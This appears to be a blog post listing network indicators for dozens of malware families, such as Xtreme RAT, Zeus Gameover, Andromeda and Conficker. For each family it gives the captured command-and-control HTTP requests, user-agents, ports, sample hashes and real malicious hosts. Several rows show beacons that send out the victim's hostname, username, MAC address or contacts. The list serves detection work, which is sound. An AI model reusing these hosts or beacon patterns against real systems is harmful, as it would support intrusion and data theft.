WEBC2-Clover GET /Default.asp /Default.asp "Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/x-shockwave-flash
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Win32)
Host: 209.161.249.125
Connection: Keep-Alive
Cookie: PREF=86845632017245" "Mozilla/4.0 (compatible; MSIE 7.0; Win32)
Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; SV1) Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 
When instructed to download a file, the malware will us the following User-Agent:
Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.8.0.12) Firefox/1.5.012" 2fccaa39533de02490b1c6395878dd79 http://intelreport.mandiant.com/
WEBC2-CSON GET /Default.aspx?INDEX=<10_random_characters> /Default.aspx?INDEX= "User-Agent: Win32
Host: 66.129.222.1
Connection: Keep-Alive" "<HOSTNAME> 
When instructed to download a file, the malware will us the following User-Agent: 
Windows+NT+5.1" 50f35b7c86aede891a72fcb85f06b0b7 http://intelreport.mandiant.com/
WEBC2-CSON Response to commands POST /Default.aspx?ID=IMNQRSSRXK /Default.aspx?ID= "Accept: text/
Content-Type: application/x-www-form-urlencoded
User-Agent: Win32
Host: 70.62.232.98
Content-Length: 16
Cache-Control: no-cache
pn9OrT8wrT9Apn8=" "o Win32 
o <HOSTNAME> 
When instructed to download a file, the malware will us the following User-Agent: 
o Windows+NT+5.1" 50f35b7c86aede891a72fcb85f06b0b7 http://intelreport.mandiant.com/
WEBC2-HEAD GET / / "/
User-Agent: WinHTTP 1.0
Host: www.olmusic100.com
Content-Length: 28
Connection: Keep-Alive
Y29ubmVjdCBURVNUTUFDSElORQ==" WinHTTP 1.0 649d54bc9eef5a60a4b9d8b889fee139 http://intelreport.mandiant.com/
WEBC2-Table GET /order.htm /order.htm "User-Agent: <current_time>+<hostname>
Host: meeting.toh.info
Connection: Keep-Alive
Cache-Control: no-cache
The malware uses the following User-Agent string: o <current_time>+<hostname>" <current_time>+<hostname> 7a7a46e8fbc25a624d58e897dee04ffa http://intelreport.mandiant.com/
Xpaj POST /DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM &ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh /DxODlv? "Host: nortiniolosto.com
Content-Length: 1279
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Pragma: no-cache
Cache-Control: no-cache
nortiniolosto.com" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) D5C12FCFEEBBE63F74026601CD7F39B2 http://contagiodump.blogspot.com/2012/05/mbr-rootkit-xpaj-sample.html
Xtreme Rat GET /1234567890.functions .functions "Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: shittway.zapto.org:336
Connection: Keep-Alive
Cache-Control: no-cache

S.T.A.R.T.S.E.R.V.E.R.B.U.F.F.E.R..fm.......A.(.d,_.. .,T..N...............q>" Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; . NET CLR 3.0.04506.648; .NET CLR 3.5.21022) 336 DAEBFDED736903D234214ED4821EAF99
Xtreme Rat GET /1234567890.functions .functions "Accept:/Accept-Encoding:gzip,deflate
User-Agent:Mozilla/4.0(compatible;MSIE7.0;WindowsNT5.1;Trident/
4.0;.NETCLR1.1.4322;.NETCLR2.0.50727;.NETCLR3.0.4506.2152;.NETCLR3.5.30729;.
NET4.0C)
Host:172.16.1.1:4000
Connection:Keep-Alive" "Mozilla/4.0(compatible;MSIE7.0;WindowsNT5.1;Trident/
4.0;.NETCLR1.1.4322;.NETCLR2.0.50727;. NETCLR3.0.4506.2152;.NETCLR3.5.30729;.
NET4.0C)" 4000
Zeus Gameover GET /search.php?page=73a07bcb51f4be71 /search.php?page= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
Host: telecrop.com
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1 http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
BitcoinMiner POST {"id": 1, "method": "mining.subscribe", "params": ["suckerrr/2.3.2"]} "{""id"": 1, ""method"": ""mining.subscribe"", ""params"": [""suckerrr/2.3.2""]}
{""error"": null, ""id"": 1, ""result"": [[""mining.notify"", ""ae6812eb4cd7735a302a8a9dd95cf71f""], ""f80e8a14"", 4]}
{""params"": [63], ""id"": null, ""method"": ""mining.set_difficulty""}
{""params"": [""8de"", ""72216db0a2e9151d8b8172470729848cbeecf1080cb8f37f65d047efb2c749f3"", ""01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff2303122606062f503253482f04a5c4035208"", ""092f7374726174756d2f000000000100fb422a010000001976a9143c5adb00f1457309f084675941f114b8c09b6af188ac00000000"", [""fc25ce83ea8ce3200ed2f56e7cf1ec43a8837118ddd965759c8fbe4d12a04f82"", ""ee78512684f4bb06bcbed1aa01703e10bbb733dc16cccaf387df0b18f656f234""], ""00000001"", ""1b4e2a39"", ""5203c4a4"", true], ""id"": null, ""method"": ""mining.notify""}
{""id"": 2, ""method"": ""mining.authorize"", ""params"": [""hitmanuk.4"", ""123""]}" "none in request but file strings: 
User-Agent: suckergo/2.3.2
" 9000 e2c655db1ccd3a632ded94eacb933643 = part of f865c199024105a2ffdf5fa98f391d74 dropper - downloaded by Blazebot DBAF6F1D0EAAB5DC0C88B9CEEC9EA95E http://lavasoft.com/mylavasoft/malware-descriptions/blog/blazebot
Blazebot IRC "<p>NICK USA|94576
<p>USER vtptdwd 0 0 :USA|94576" "NICK USA|94576
USER vtptdwd 0 0 :USA|94576
:DIE.Blazed-IRC.com NOTICE AUTH :*** Looking up your hostname...
:DIE.Blazed-IRC.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:DIE.Blazed-IRC.com NOTICE USA|94576 :*** If you are having problems connecting due to ping timeouts, please type /quote pong 5FC26DC1 or /raw pong 5FC26DC1 now.
PING :5FC26DC1
PONG :5FC26DC1
JOIN #fkyou# stay0ut
:DIE.Blazed-IRC.com 001 USA|94576 :Welcome to the Blazed-IRC IRC Network USA|94576!vtptdwd@[victimIp]" 6667 http://lavasoft.com/mylavasoft/malware-descriptions/blog/blazebot
Nurjax Adware GET /services/rules.txt?dummy=916 /rules.txt?dummy= 80 http://www.symantec.com/security_response/writeup.jsp?docid=2014-121000-1027-99&tabid=2
Tosct GET Y3vaR7-V0Vj6gdni3YuQapMm84ziJeVnq6JYh44tD nEsVEiZEgOaQwpn1RARQDujk5H r9SUuFwP4oIvv2mp7HEF1VTXRemWB5M kE8mxcxRmV Y3vaR7-V0Vj6gdni 8000 BDD2AD4C0E1E5667D117810AE9E36C4B http://www.threatexpert.com/report.aspx?md5=bdd2ad4c0e1e5667d117810ae9e36c4b <p> http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Backdoor:Win32/Tosct.A#tab=2
Nocpos GET <p> POST "<p>/check/echo
<p>/check" /check "POST /check HTTP/1.1
User-Agent: something
Content-Type: application/x-www-form-urlencoded
Host: support.wordpress-dark.com
Content-Length: 35
Cache-Control: no-cache
Cookie: __cfduid=dbfbc3842507971794fa2b7ca3316563e1418788175
address=08-00-27-68-68-B9&dt1=&dt2=" something 80 http://virustotal.com/en/file/09ca7be86f517f2e3238e1d52115d29fb2dd079a4d9fc60c18ddc823c137a940/analysis/
OnionDuke GET "<p>/forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPy QiNG6pFyBy3ScAf+QicXPsfnlz7HZRZyQiNBqcSjR2mSckfo k/IZeMI3Q6kTfIGpxKNH69dygatW6dP40D CHLd3xAv5CJxX8hGVW/QZnVg=
<p>s/sysinfo_7.php
<p>/forum/phpBB3/prx_26.php" /phpBB3/ <p> /sysinfo_7.php "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rombeast.site50.net
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 80 28f96a57fa5ff663926e9bad51a1d0cb https://www.f-secure.com/v-descs/backdoor_w32_onionduke.shtml
Lagulon (Operation Cleaver) POST "<P>/contador/server.php
<P>/i/server.php
<P>/includes/server.php" /server.php "POST /contador/server.php HTTP/1.1
Content-Disposition: inline; comp=<PC-NAME>; account=<USERNAME>; product=3;
User-Agent: Mozilla/5.0
Host: halon.com.br
Content-Length: 0
Cache-Control: no-cache" Mozilla/5.0 80 https://www.virustotal.com/en/file/e401340020688cdd0f5051b7553815eee6bc04a5a962900883f1b3676bf1de53/analysis/ <p> http://telussecuritylabs.com/threats/show/TSL20141210-04
Medusa POST "<p>%s/bbc_mirror/%s/search?id=%s
<p>/CNN_Mirror/EN/%s/search?id=%s
<p>|00|U|00|n|00|d|00|e|00|r|00 20 00|C|00|o|00|n|0 0|s|00|t|00|r|00|u|00|c|00|t|00|i|00|o|00|n|00" _mirror/%s/search?id= f8f74f17af1e3069bf780824ba26b33f <p> 3c0a2d353461c32a5f34e931e9aba71d http://totalhash.com/analysis/820ea0a145f7c9ee7fa99176c5d59d5f20ada310
Toopu GET "<p>/toopu.png
<p>/%s:1048%s
<p>/num3.html
<p>/web/get_ad3.asp?type=loadall&machinename= <MACHINE_NAME>-6C78A9C3&cr=yes
<p>/num3_51la.asp" /toopu.png "GET /toopu.png HTTP/1.1
Accept: */*
Referer: 
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
Host: 174.128.244.58
Connection: Keep-Alive
Cookie:" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215) 808
Twerkin GET "<p>/classes/functions.php?functionname=online
<p>/classes/functions.php?functionname=getupdates
<p>/classes/functions.php?functionname=getcommand
" /classes/functions.php?functionname= "Host: nettwerk.x10.mx
Connection: Keep-Alive" 80 a27721f3b9566601030daab58c092c14 http://telussecuritylabs.com/threats/show/TSL20141231-03
TzeeBot / TinyZBot POST /checkupdate.asmx /checkupdate.asmx "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)
Content-Type: text/xml; charset=utf-8
SOAPAction: ""http://tempuri.org/GetServerTime""
Host: 95.211.241.249
Content-Length: 291
Expect: 100-continue
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433) 96e372dea573714d34e394550059b1d7
XLS URLDownload ToFileA function for Dridex GET /koh/mui.php /mui.php 8080 34fa02bb258c93cdf17cb49f25bc0866
Quervar / Induc.C / Dorifel GET "<p>/js/way.php?00021708&pin=7DF38AD66C78A9C3
<p>/404/way.php?00038F50&pin=7DF38AD66C78A9C3
<p>/test/php/way.php?0002E170&pin=7DF38AD66C78A9C3
<p>/1.php?JXU9WXFG&pin=DEC09603F4CEFD80" &pin= "GET /1.php?JXU9WXFG&pin=DEC09603F4CEFD80 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MASP)
Host: greatnewidea1.ru
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) 52466 2b62b641bcb2aebef64632cbf0dd37cf http://www.welivesecurity.com/2012/08/21/quervar-induc-c-reincarnate/ <p> http://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/115/the-significance-of-quervar <p> https://www.virustotal.com/en/file/98370c3710c7c4fc8a50b0804c00a9a27d5f93e166a4aa739073febdf894a879/analysis/
Feidowns downloader / Kilim (?) / Cracktools GET "<p>yeniadmin.php?os=WindowsXP 
<p>/yeniadmin.php?os=Windows7&osbit=64&antiv 
<p>/yeniadmin.php?os=Windows7&osbit=64&antiv= Nonti&kart=KotuKart&core=2&mhz=HIZLI
http://whos.amung.us/pingjs/?k=yenikazi" .php?os= <p>&kart=KotuKart&core "GET /yeniadmin.php?os=WindowsXP&osbit=32&antiv=Nonti&kart=KotuKart&core=1&mhz=HIZLI HTTP/1.1
User-Agent: Access
Host: feidowns.com
" Access 80 2b62b641bcb2aebef64632cbf0dd37cf
GameVance Adware GET /aj/updtah.php /updtah.php 80 1e78fe18d2e2077ae991a9e4e93d2a7c https://malwr.com/analysis/N2MzNzdhODJhZWIxNGRmNTk5ZmUwMTUzZWE0OWI1Mjc/
OpenShopper Adware GET "<p>//mmsv/Access3.php
<p>//opendb/mmsv.php
<p>//mmsv/Access2.php
<p>/opapp/postmedia1/Update.dat
<p>/opapp/postmedia1/OKUpdate.exe" mmsv <p> opapp 80 38F2EFA2D40FF3ACF0C57CB4B59A250E http://www.threatexpert.com/report.aspx?md5=38f2efa2d40ff3acf0c57cb4b59a250e
SoftPulse Adware GET /c1tUKWsgnKU-dj1topuyK5IJyJDyPxUcSecVJoVe9_Ia UehZv2XWFP9hUE9WBXK6dtr5pu-_UVXfXoJ EkJ2cXo_DiJQLkxeGA4qJAfSJNXldTCuV5 XTer9cA2OOj_9Le_lq46VOlx6w8QrR0XwefWJguJti H8n4I81acQHcoYVRg aYP43_wbgv6_2Vf3NfFqPD7vqcR-i0 sYMo4Qppk0aw?sbb=% 5B%22%5B%27Ft%22%5D&tt=%5B%277adb505cc a6f3e3ff2d0335ce560ff81665ffe1b%27%5D&lpd=%5B%27w ww.r7wti7bwji.com%27%5D&sbb_check=%5B%271 %27%5D&fileName=%5B%2 7Setup%27%5D 80 c04017a08f3e4cebd9b7b20308ee8257
FakeAV GET "<p>/[...]/load.php?file=uploader
<p>/[...]/load.php?file=grabbers
<p>/[…]/load.php?file=1
<p>/ohwgx3kiTh/document.doc
<p>/ohwgx3kiTh/load.php?file=0" load.php?file= 80 https://www.f-secure.com/v-descs/trojan-downloader_w32_kdv176347.shtml
Wauchos (download by Zbot of Cridex) POST "
<p>/ssdc32716372/file.php
<p>/auto*.it/*/jeve.exe
<p>//dd*.ru/old.exe
" /ssdc32716372/file.php "POST /ssdc32716372/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022
Host: 188.225.72.229
Content-Length: 128
Connection: Keep-Alive
Cache-Control: no-cache
.(c...<..T3..DE._..p.[..f12...j.P.....i...G.,(....Y5y...........s..,..,u...n0...].S.....n._X$...E.3Y.Z8.....hY.xJ..*..WN.FNE.V." Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022 80 0d8d7a8074ee36a626d086f02490aaab https://www.f-secure.com/weblog/archives/00002759.html
Blackenergy DDos Bot POST "<p>id=[bot_id]&bid=[base64_encoded_build_
id]&dv=[x]&mv=[y]&dpv=[z]
<p>id=[bot_id_sha1]&bid=[base64_encoded_build_
id]&nm=[x]&cn=[y]&num=[z]
The only major difference is that the id field contain just
the hash instead of the actual string" https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf
Alurewo / Alureon pay per click GET /click.php?c=f39daf0d969abd8fe186a9656341ed05a4 3d126e9e462ccfdca3a56f8a930786f70c0d48ec6bbc7 f11fa545f5e2926f54123019882b9a3fc4a6a6b 711ae23b8587d1f45d7324667bb5f3e447f05b43c5 /click.php?c= "GET /click.php?c=f39daf0d969abd8fe186a9656341ed05a43d126e9e462ccfdca3a56f8a930786f70c0d48ec6bbc7f11fa545f5e2926f54123019882b9a3fc4a6a6b711ae23b8587d1f45d7324667bb5f3e447f05b43c5 HTTP/1.1
Accept: */*
Referer: http://retravopoytem.com/search.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 184.164.143.90
Connection: Keep-Alive" Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; 80 http://www.malware-traffic-analysis.net/2014/06/24/index2.html
OSX Wirelurker GET mac/getversion.php?sn=<SN> /getversion.php?sn= "GET /mac/getversion.php?sn=C02N9LBSG083 HTTP/1.1
Host: www.comeinbaby.com
Accept-Language: zh-Hans, en, en-us
User-Agent: globalupdate (unknown version) CFNetwork/720.2.4 Darwin/14.1.0 (x86_64)
Connection: keep-alive" globalupdate (unknown version) CFNetwork/720.2.4 Darwin/14.1.0 (x86_64) 80 www.virustotal.com/en/file/93856f704db2efe2e2262e6c710a23d03d6b0748c02e4d5d8d2d4e25f56a8b32/analysis/
Systweak Adware - Systweak RegClean Pro & Advanced System Protector GET /getipaddress.asp /getipaddress.asp "GET /getipaddress.asp HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: www.k9pcfixer.com
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) 80 0ae593e18649d696ed578e792b75558d https://www.virustotal.com/en/file/82fc51cbdee9cf104af95a94415ff48190f55dc9ddf2de003753cbac099d392c/analysis/
MPlug / Multiplug Adware GET "/?step_id=1&sf=1&installer_id=8605008392702878770 &publisher_id=2356&source_id= 0&
page_id=0&affiliate_id= 0&country_code=US&locale=EN&browser_id =4&download_id=7
371188128136903471 &external_id=0&installer_type= IX_2013&hardware_id= 159796436
02580996082&session_id =17077067485576374638&installer _file_name=Doctorow%2C+E
+L +-+3+books+.rar&filesize =4.5+MB&product_name= TusFiles&product_title=Doctoro
w %2C+E+L+-+3+ books+.rar&product_download _url=http%3A%2F%2Fk.tusfiles.net %2Fd%
2F74la37ldtz2fvxijot2ypuiocogpoue4j7 hnpl5ilkwxlr7gf5ttsjcj%2FDoctorow%2C+E+L+
-+3+books+.ra r&product_file_name=Doctorow %2C+E+L+-+3+books+. rar&project_encod
e_id=2356&ttl= 1422295723363&isRedirected= 1&enc_u_p=1&st=0&IX_Startapp= 1&self_
redirect=0&st=0&reffer= http%3A%2F%2Ftusfiles.net %2F&for_html_installer=1&layo
ut_id= 8&project_name=TusFiles&uuid=%252A" /?step_id=1&sf=1& "GET /?step_id=1&sf=1&installer_id=8605008392702878770&publisher_id=2356&source_id=0&page_id=0&affili
ate_id=0&country_code=US&locale=EN&browser_id=4&download_id=7371188128136903471&external_id=0&ins
taller_type=IX_2013&hardware_id=15979643602580996082&session_id=17077067485576374638&installer_fi
le_name=Doctorow%2C+E+L+-+3+books+.rar&filesize=4.5+MB&product_name=TusFiles&product_title=Doctor
ow%2C+E+L+-+3+books+.rar&product_download_url=http%3A%2F%2Fk.tusfiles.net%2Fd%2F74la37ldtz2fvxijo
t2ypuiocogpoue4j7hnpl5ilkwxlr7gf5ttsjcj%2FDoctorow%2C+E+L+-+3+books+.rar&product_file_name=Doctor
ow%2C+E+L+-+3+books+.rar&project_encode_id=2356&ttl=1422295723363&isRedirected=1&enc_u_p=1&st=0&I
X_Startapp=1&self_redirect=0&st=0&reffer=http%3A%2F%2Ftusfiles.net%2F&for_html_installer=1&layout
_id=8&project_name=TusFiles&uuid=%252A HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.91
2.75 Safari/535.7
Host: c1.diriginal.org
Cache-Control: no-cache" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.91
2.75 Safari/535.7" 80 2ea0bcb1ca764a01571a09208e892199 https://www.virustotal.com/en/file/d0a87d7b635d2313c1b4011e38c70e3c080bdf08be4d7a36344119d2c6e84ee6/analysis/
Nemucod JS GET "/document.php?id=5451565E011705000B120124031 309050D084A0313114A010011& rnd=212939
1" /document.php?id= "GET /document.php?id=5451565E011705000B120124031309050D084A0313114A010011&rnd=2129391 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 64.239.7.212
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) 80 e77334c5995614fc79f285abca8e14ad https://www.virustotal.com/en/file/6ead063f36bf906ff05055db42c9d7c6acc7d9729179286d8c9b30d52e815def/analysis/1422638297/
Andromeda / Wauchos POST /and/gate.php /gate.php "POST /and/gate.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/4.0
Host: ddnsse3ravis221.com.ua
Content-Length: 70
Cache-Control: no-cache
Pragma: no-cache BluO7awLMtZaAIV/b4XorzWUEUS000s6jUz7rTt5FY0uIjIc2nZdut5ZShu4vUIz
us4=
" Mozilla/4.0 80 607a24ccf8a82796384ae113f29e6ab5 https://www.virustotal.com/en/file/11f6c17e317e02b71888133656029a322da6ada5f9f11cdfd90127aca0ff6a2a/analysis/
Poweliks click-fraud GET /click?sid=8f75f821c687855c53899112090ed27514c7 49fdcid=0 /click?sid= 80 http://www.trendmicro.com/vinfo/us/threat-encyclopedia/malicious-url/6528
Poweliks click-fraud GET /click.php?c=3a293fcf1ec6d783daa5c0e6c98d5430fa1 c105d8c9 /click.php?c= 80 http://www.trendmicro.com/vinfo/us/threat-encyclopedia/malicious-url/6528
Yoddos / Darkshell / YoYoDDoS 75 71 7a d6 75 8a 8e 92 8f 90 ce 8a 91 cd d6 c8 OR uqz.u... ........ uqz.u... ........ 60249 ace89709b1ca5db8462d238712ab2ee7 http://www.arbornetworks.com/images/documents/White%20Papers%20and%20Research/WP_ASERT_EN.pdf
Cobra / Turla POST "/%s/%s?
uid=%d&context=%s&mode=text&data=%s" 554450c1ecb925693fedbb9e56702646
Panda POST /forum/login.cgi /login.cgi
Panda POST /Photos/Query.cgi?loginid= Query.cgi?loginid= https://github.com/kbandla/APTnotes/blob/master/2014/AdversaryIntelligenceReport_DeepPanda_0%20(1).pdf
Aided Frame GET /img/js.php /img/js.php https://github.com/kbandla/APTnotes/blob/master/2014/Aided_Frame_Aided_Direction.pdf
Scanbox Watering hole framework POST /i/recv.php /i/recv.php
Blackenergy DDos Bot GET /upgrade/f3395cd54cf857ddf8f2056768ff49ae/getcfg.php /getcfg.php hxxps://46.165.222.28/upgrade/f3395cd54cf857ddf8f2056768ff49ae/getcfg.php https://github.com/kbandla/APTnotes/blob/master/2014/BlackEnergy2_Plugins_Router.pdf
Syria Twitter. apk POST /contacts /contacts "POST /contacts HTTP/1.1
Content-Length: 43
Content-Type: application/x-www-form-urlencoded
Host: 80.241.223.128:4646
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
contact%26=null%26John+Rogers%26+2175566789" b91315805ef1df07bdbfa07d3a467424 https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-behind-the-syria-conflict.pdf
TinyBaron / Miniduke / CosmicDuke GET "<p> /modules/db/mgr.php?
<p> /modules/db/mgr.php?F=3?
" /modules/db/mgr.php? "<p> 8e5106565fd96df1308d208d1e3426a3
<p> f22606385080d35551e7f8e8f49b7de9
" http://www.symantec.com/security_response/writeup.jsp?docid=2014-052717-4610-99
Moure GET "<p> /db3Hv2VxYi1kZXhgc29tdWsDZGV6YXM=
<p> /HEQ5HoZ2LSxkZWFgc29tdWt9CxUKDg BPLBsfR0kzCxMGHG11ay5k
<p> /HUQ-EIdsIWdkcGdnLm9yZ2MyGxEEABR FJR4QDwM5GxUWEnRhbG9n
<p> /G1clBYJoKWYuZGZkcm90aWs8C14MChZ SLhodAkIyRxYQFnJvdGlr
<p> /GFAmHZhsNmducy1vZXRmdWw_HB8YC h1TbwARHUsjBR4GHHBlbnMu
<p> /FkooHoZsNCxkZWtuYm9tb3J9CxUAABFP LAEGR0kzAR0XHG1vci5k" 80 3a8715ca4dbc233e68e8063b5c76f0f7 <p> 10002e607b1179593df21bd2825ccf17 http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Moure-D/detailed-analysis.aspx
Vundo GET "<p> /webhp
<p> /wpad.dat" "<p> /webhp
<p> /wpad.dat" User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 80 07c0824d98d7894882171ec40b633b30 http://home.mcafee.com/VirusInfo/VirusProfile.aspx?key=4216306#none
Lostdoor RAT "INFO||LostDoor-001|Remote PC|| Windows XP Professional|<time>|511.56 MB|No|C:\\\\WINDOWS\\\\system32\\\\cmd.exe|2:13:42 
" |LostDoor-001
Protux worm POST """<p> http://ruthless.hobby-site.com:80/PHqgHumeay5705.mp3 
<p> http://202.71.136.14:80/ggBwkFNqDu1869.avi
<p> /newTroy.jpg"" 
<p> /http://Microsoft.dumb1.com:80/PHqgHumeay5705.mp3" "<p> .mp3 
<p> .rar 
<p> .avi 
<p> .jpg
" "POST http://ruising.webmailerservices.com:80/ggBwkFNqDu1869.avi HTTP/1.1
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Host: ruising.webmailerservices.com 
Content-Length: 42
Proxy-Connection: keep-alive
Pragma: no-cache" Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32) 80 "ce4733f42cb169f853abfd38b3ba2ffb
123e186577d3b7deb3f338fa675f3e8a" http://camas.comodo.com/cgi-bin/submit?file=2ed5823001b672a37cecdb01b74ebf3eedb59fb112a551efb4988998aa800ca5
Conficker / Kido worm GET / ip checking services / ip checking services "GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Host: www.getmyip.org
Cache-Control: no-cache

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Host: www.whatsmyipaddress.com
Cache-Control: no-cache


GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Host: checkip.dyndns.org
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) 80 http://mtc.sri.com/Conficker/
Dingu / Proxy GET "<p> /1.jpg
<p> http://webemail.bounceme.net:8080/directget42.gif

" "
<p> .jpg
<p> .gif

" """GET /1.jpg HTTP/1.1
X-HOST: Remote PC@10.0.1.15
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0)
Host: 11.36.214.181
Connection: Keep-Alive
Cache-Control: no-cache

GET http://webemail.bounceme.net:8080/directget42.gif HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.1.3; Windows NT 5.0.3)
Host: webemail.bounceme.net
X-HOST: mr-computer@192.168.5.133
Pragma: no-cach" Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0) 80 "CD19E4D5EC26C1DD72F39537750F0A60
efa1add763eef93e8d759b090bfe518e


" http://safezonecast.lgcns.com/Common/MenaceInfo/pop.MenaceInfo.jsp?code=SZ1301-0001NS <p> http://telussecuritylabs.com/threats/show/TSL20130115-05



















No comments:

Post a Comment